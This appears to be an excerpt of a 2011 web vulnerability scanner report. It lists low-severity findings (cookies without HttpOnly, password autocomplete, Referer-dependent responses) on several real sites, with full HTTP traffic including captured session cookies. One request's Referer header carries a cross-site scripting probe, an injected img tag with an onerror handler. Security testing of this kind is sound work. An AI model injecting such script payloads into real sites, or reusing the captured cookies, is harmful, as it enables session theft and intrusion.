<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
10.134. https://www.ccnow.com/cgi-local/checkout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /cgi-local/checkout.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980
Content-Length: 287

action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Productio
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:52 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950072; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:52 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18997

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
10.135. https://www.ccnow.com/cgi-local/sc_cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /cgi-local/sc_cart.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980
Content-Length: 365

seq1_asmakit_pid=AKR214&seq1_asmakit_quan=1&coupon_asmakit=&shipreg_asmakit=BC%3AUS&action=update&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=ZZ&cids=asmakit
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:50 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950070; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:50 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
11. Password field with autocomplete enabled  previous  next
There are 5 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

11.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
<form action="/news/sufjan-stevens-suffered-nervous-breakdown?destination=login_redirect" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" tabindex="2" class="form-text required" />
</div>
...[SNIP]...
11.2. http://www.clashmusic.com/user/a  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /user/a HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:13:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:13:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<!-- CONTENT AREA -->
                   
                    <form action="/user/a?destination=login_redirect" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" size="60" tabindex="2" class="form-text required" />
<div class="description">
...[SNIP]...
11.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /odygel/lib/userauth/content/login.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 22:45:32 GMT
Accept-Ranges: bytes
ETag: "08e11cf1685cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 2828

   <div class="ody-login-box clearfix">
       <a><div id="ody-login-close" class="ody-close"></div></a>
       <div class="ody-title">Log In<span class="ody-orsignup" id="ody-login-signup" >or&nbsp;<a>Sign Up<
...[SNIP]...
</div>
       <form id="ody-login-form" onsubmit="return false">
       <div class="ody-fields">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Login.Click, 13);" style="width: 200px" />
                   </div>
...[SNIP]...
11.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /odygel/lib/userauth/content/signup.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 21:52:00 GMT
Accept-Ranges: bytes
ETag: "0c064a9a186cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 7620

   <div class="ody-pa-box ody-su-box clearfix">
       <a><div id="ody-signup-close" class="ody-close"></div></a>
       <div class="ody-title">Sign Up<span class="ody-orlogin" id="ody-signup-login">or <a>Log i
...[SNIP]...
</div>
           <form id="UAWidget-Registration" name="UAWidget-Registration" onsubmit="return false">
           <div id="ody-signup-main" class="ody-noerrors">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
<div class="ody-f-i"><input type="password" id="ConfirmPassword" name="ConfirmPassword" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
11.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kxuwnfahnyntrb45nyzhom55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<!--googleoff: index-->


<form name="aspnetForm" method="post" action="../../content/detail.aspx?id=23458" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td class="input"><input name="ctl00$HeaderNavigationControl$ctl00$Login1$Password" type="password" id="ctl00_HeaderNavigationControl_ctl00_Login1_Password" style="width:128px;" /></td>
...[SNIP]...
12. Referer-dependent response  previous  next
There are 10 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

12.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.burst/B5229711.3

Request 1

GET /adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 14:01:21 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7033

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated
...[SNIP]...
"http://s1.2mdn.net/998766/1052_300x250_Promo_FreeGalaxyS_Android_Static.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BKS8xsfPHTdDJFsmV6Aarm5ivBAAAAAAQASAAOABQu-inzvj_____AVjRkYYUYMmGhYmIpIQQggEJY2EtZ29vZ2xlsgELd3d3Lm5tZS5jb23IAQnaASxodHRwOi8vd3d3Lm5tZS5jb20vbmV3cy9zdWZqYW4tc3RldmVucy81NjUyN8ACAqgDAdgEgK3iBOAEApoFFwjRgBQQ1_GqHhjgweBwINGRhhQo7vo82gUCCAA&num=0&sig=AGiWqtwvP3w2Vn-spxO7hgEDexBlPgen5A&client=&adurl=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS%3D2iU9W.LI1r/K%3DADS_T200/SZ%3D300X250A/V%3D2.3S//REDIRURL%3Dhttp://www.t-mobile.com/shop/phones/default.aspx%3Fmanufacturer%3D9c43c518-8abb-453d-a0cd-8b7e912ff3fe");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BKS8xsfPHTdDJFsmV6Aarm5ivBAAAAAAQASAAOABQu-inzvj_____AVjRkYYUYMmGhYmIpIQQggEJY2EtZ29vZ2xlsgELd3d3Lm5tZS5jb23IAQnaASxodHRwOi8vd3d3Lm5tZS5jb20vbmV3cy9zdWZqYW4tc3RldmVucy81NjUyN8ACAqgDAdgEgK3iBOAEApoFFwjRgBQQ1_GqHhjgweBwINGRhhQo7vo82gUCCAA&num=0&sig=AGiWqtwvP3w2Vn-spxO7hgEDexBlPgen5A&client=&adurl=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS%3D2iU9W.LI1r/K%3DADS_T200/SZ%3D300X250A/V%3D2.3S//REDIRURL%3Dhttp://www.t-mobile.com/shop/phones/default.aspx%3Fmanufacturer%3D9c43c518-8abb-453d-a0cd-8b7e912ff3fe");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BKS8xsfPHTdDJFsmV6Aa
...[SNIP]...

Request 2

GET /adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 14:01:37 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 6709

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated
...[SNIP]...
"http://s1.2mdn.net/998766/1052_300x250_Promo_FreeGalaxyS_Android_Static.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BOpGUwfPHTdqlLM2k6Qah1rWuBAAAAAAQASAAOABQu-inzvj_____AVjRkYYUYMmGhYmIpIQQggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUXCNGAFBDX8aoeGODB4HAg0ZGGFCju-jzaBQIIAA&num=0&sig=AGiWqtwGhuEpVeNOXpOj1NAWZsJs31J4NQ&client=&adurl=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS%3D2iU9W.LI1r/K%3DADS_T200/SZ%3D300X250A/V%3D2.3S//REDIRURL%3Dhttp://www.t-mobile.com/shop/phones/default.aspx%3Fmanufacturer%3D9c43c518-8abb-453d-a0cd-8b7e912ff3fe");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BOpGUwfPHTdqlLM2k6Qah1rWuBAAAAAAQASAAOABQu-inzvj_____AVjRkYYUYMmGhYmIpIQQggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUXCNGAFBDX8aoeGODB4HAg0ZGGFCju-jzaBQIIAA&num=0&sig=AGiWqtwGhuEpVeNOXpOj1NAWZsJs31J4NQ&client=&adurl=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS%3D2iU9W.LI1r/K%3DADS_T200/SZ%3D300X250A/V%3D2.3S//REDIRURL%3Dhttp://www.t-mobile.com/shop/phones/default.aspx%3Fmanufacturer%3D9c43c518-8abb-453d-a0cd-8b7e912ff3fe");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BOpGUwfPHTdqlLM2k6Qah1rWuBAAAAAAQASAAOABQu-inzvj_____AVjRkYYUYMmGhYmIpIQQggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUXCNGAFBDX8aoeGODB4HAg0ZGGFCju-jzaBQIIAA&num=0&sig=AGiWqtwGhuEpVeNO
...[SNIP]...
12.2. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Request 1

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; 